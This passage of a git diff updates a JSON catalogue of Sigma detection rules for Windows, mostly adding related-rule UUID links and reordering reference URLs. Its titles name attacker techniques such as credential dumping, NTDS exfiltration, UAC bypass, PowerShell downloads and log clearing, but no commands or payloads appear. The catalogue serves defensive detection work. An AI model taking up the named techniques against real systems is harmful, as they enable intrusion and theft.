"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", + "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ @@ -48233,6 +62102,22 @@ "car.2016-04-002" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil" }, @@ -48283,6 +62168,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "value": "Write Protect For Storage Disabled" }, @@ -48310,6 +62204,22 @@ "attack.t1134.002" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "15619216-e993-4721-b590-4c520615a67d", "value": "Meterpreter or Cobalt Strike Getsystem Service Start" }, @@ -48334,6 +62244,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "value": "Suspicious Certreq Command to Download" }, @@ -48357,6 +62276,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", "value": "Stop Windows Service" }, @@ -48381,6 +62309,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "value": "Process Creation with Renamed BrowserCore.exe" }, @@ -48405,6 +62349,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", "value": "Suspicious Listing of Network Connections" }, @@ -48429,6 +62382,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder" }, @@ -48456,6 +62418,15 @@ "attack.t1083" ] }, + "related": [ + { + "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", "value": "Seatbelt PUA Tool" }, @@ -48481,6 +62452,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", "value": "UAC Bypass Abusing Winsat Path Parsing - Process" }, @@ -48505,6 +62485,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", "value": "Suspicious Reg Add BitLocker" }, @@ -48529,6 +62518,15 @@ "attack.t1216.001" ] }, + "related": [ + { + "dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", "value": "Launch-VsDevShell.PS1 Proxy Execution" }, @@ -48554,6 +62552,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "value": "Always Install Elevated Windows Installer" }, @@ -48582,6 +62589,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", "value": "Sdiagnhost Calling Suspicious Child Process" }, @@ -48647,8 +62663,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" ], "tags": [ @@ -48680,6 +62696,15 @@ "attack.privilege_escalation" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "value": "Suspicious Shells Spawn by SQL Server" }, @@ -48706,6 +62731,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b572dcf-254b-425c-a8c5-d9af6bea35a6", "value": "Suspicious Xor PowerShell Command Line" }, @@ -48731,6 +62765,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "value": "UAC Bypass Using MSConfig Token Modification - Process" }, @@ -48747,9 +62790,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://twitter.com/splinter_code/status/1483815103279603714", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" ], @@ -48805,6 +62848,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", "value": "Script Interpreter Execution From Suspicious Folder" }, @@ -48832,6 +62884,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "value": "Suspicious PowerShell Cmdline" }, @@ -48848,8 +62909,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" ], "tags": [ @@ -48857,6 +62918,15 @@ "attack.t1218.001" ] }, + "related": [ + { + "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "value": "HH.exe Remote CHM File Execution" }, @@ -48873,8 +62943,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" ], "tags": [ @@ -48882,6 +62952,15 @@ "attack.t1560" ] }, + "related": [ + { + "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "value": "Conti NTDS Exfiltration Command" }, @@ -48906,6 +62985,15 @@ "attack.t1562" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", "value": "Windows Firewall Disabled via PowerShell" }, @@ -48932,6 +63020,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", "value": "Invoke-Obfuscation VAR+ Launcher" }, @@ -48958,31 +63055,6 @@ "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "value": "Suspicious Svchost Process" }, - { - "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_bitstransfer.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.persistence", - "attack.t1197" - ] - }, - "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", - "value": "Suspicious Bitstransfer via PowerShell" - }, { "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", "meta": { @@ -49004,6 +63076,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "value": "Suspicious NT Resource Kit Auditpol Usage" }, @@ -49030,6 +63111,22 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7825193-b70a-48a4-b992-8b5b3015cc11", "value": "Windows Update Client LOLBIN" }, @@ -49046,8 +63143,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/shantanu561993/SharpChisel", "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/shantanu561993/SharpChisel", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" ], "tags": [ @@ -49055,6 +63152,15 @@ "attack.t1090.001" ] }, + "related": [ + { + "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "value": "SharpChisel Usage" }, @@ -49072,8 +63178,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ @@ -49099,9 +63205,9 @@ "refs": [ "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", "http://blog.sevagas.com/?Hacking-around-HTA-files", - "https://twitter.com/mattifestation/status/1326228491302563846", "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", + "https://twitter.com/mattifestation/status/1326228491302563846", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" ], "tags": [ @@ -49113,6 +63219,29 @@ "cve.2020.1599" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "value": "MSHTA Suspicious Execution 01" }, @@ -49160,6 +63289,29 @@ "attack.t1574.005" ] }, + "related": [ + { + "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "70d81154-b187-45f9-8ec5-295d01255979", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "value": "SharpUp PrivEsc Tool" }, @@ -49176,8 +63328,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" ], "tags": [ @@ -49185,6 +63337,15 @@ "attack.t1005" ] }, + "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", "value": "VeeamBackup Database Credentials Dump" }, @@ -49209,6 +63370,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", "value": "WMI Uninstall An Application" }, @@ -49225,8 +63395,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", "https://twitter.com/harr0ey/status/991670870384021504", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" ], "tags": [ @@ -49234,6 +63404,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "value": "OpenWith.exe Executes Specified Binary" }, @@ -49250,8 +63429,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" ], @@ -49260,6 +63439,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b768e71-86f2-4879-b448-81061cbae951", "value": "Suspicious Manipulation Of Default Accounts" }, @@ -49276,8 +63464,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" ], "tags": [ @@ -49286,6 +63474,15 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", "value": "Rundll32 Registered COM Objects" }, @@ -49333,6 +63530,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "value": "Suspicious Splwow64 Without Params" }, @@ -49349,9 +63555,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" ], "tags": [ @@ -49359,6 +63565,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "value": "Use NTFS Short Name in Command Line" }, @@ -49375,8 +63590,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" ], "tags": [ @@ -49385,6 +63600,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "value": "Run PowerShell Script from Redirected Input Stream" }, @@ -49436,6 +63660,22 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", "value": "Judgement Panda Exfil Activity" }, @@ -49461,6 +63701,15 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", "value": "TA505 Dropper Load Pattern" }, @@ -49487,6 +63736,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "value": "Encoded PowerShell Command Line" }, @@ -49566,6 +63824,22 @@ "attack.t1036.005" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3711eee4-a808-4849-8a14-faf733da3612", "value": "Greenbug Campaign Indicators" }, @@ -49590,6 +63864,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "value": "Windows Cmd Delete File" }, @@ -49606,8 +63889,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" ], "tags": [ @@ -49615,6 +63898,15 @@ "attack.t1218.001" ] }, + "related": [ + { + "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "value": "HH.exe Execution" }, @@ -49642,6 +63934,29 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", "value": "PowerShell DownloadFile" }, @@ -49658,8 +63973,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" ], "tags": [ @@ -49683,8 +63998,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" ], "tags": [ @@ -49709,6 +64024,71 @@ "attack.t1082" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "379809f6-2fac-42c1-bd2e-e9dee70b27f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "22522668-ddf6-470b-a027-9d6866679f67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b8cfed42-6a8a-4989-ad72-541af74475ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": 